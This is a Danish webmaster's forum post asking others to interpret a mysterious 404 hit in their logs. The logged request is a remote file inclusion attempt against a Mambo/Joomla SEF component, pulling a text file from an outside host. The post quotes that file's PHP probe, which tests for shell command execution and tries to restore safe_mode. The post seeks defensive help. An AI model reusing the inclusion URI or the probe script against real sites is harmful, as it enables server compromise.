Jeg er webmaster på et site, og har lavet en funktion, der sender mails til
mig, hver gang der registreres en 404.
Jeg ser nogle gange nogle requests, som er meget mystiske, fordi der er tale
om sider, som slet ikke findes. Hvordan vil I tolke det?
Min log indeholder følgende data om det seneste af disse hits:
REDIRECT_ERROR_NOTES:
HTTP_HOST: (mit site)
HTTP_REFERER:
HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US;
rv:1.8b4) Gecko/20050908 Firefox/1.4
HTTP_FROM:
REDIRECT_REQUEST_METHOD:
REDIRECT_STATUS: 404
REQUEST_URI:
//components/com_sef/sef.class.php?mosConfig_absolute_path=
http://mbbm.interfree.it/Varie/phpmic_txt.txt?
QUERY_STRING:
REMOTE_ADDR: 209.205.39.25
REMOTE_PORT: 34324
Den pågældende txt-fil indeholder dette PHP-script:
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0){
echo("FUCKSAFEMODEOFFBYMIC22");
}else{
echo("FUCKSAFEMODEONBYMIC22");
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;